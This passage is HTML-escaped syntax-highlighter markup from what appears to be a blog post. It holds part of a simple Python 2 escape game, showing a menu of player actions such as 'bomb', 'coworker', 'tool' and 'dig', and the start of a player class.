&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-10&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;works_list&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;{&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-11&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;'bomb'&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;make boooooooomb!!!&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-12&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;'coworker'&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;'Find Coworker For Escape'&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-13&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;'tool'&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;Find Any Tool&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-14&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;'dig'&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;Go Deep~&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-15&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;}&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-16&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-17&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-r&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;def&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;menu&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-18&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-k &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;print&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;################## Work List ##################&quot;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-19&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;for&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-k &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;cmd&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;desc &lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;in&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;works_list&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;iteritems&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-20&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-k &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;print&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;&amp;nbsp;&amp;nbsp;%-15s : %s&quot;&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;%&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-k &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;cmd&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;desc&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-21&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-k &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;print&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;###############################################&quot;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-22&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-23&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-t&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important; color: rgb(128, 0, 128) !important;&quot;&gt;class&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;Esacpe_Player&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-24&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-r&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;def&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;__init__&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-r&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;self&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;name&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;day&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) 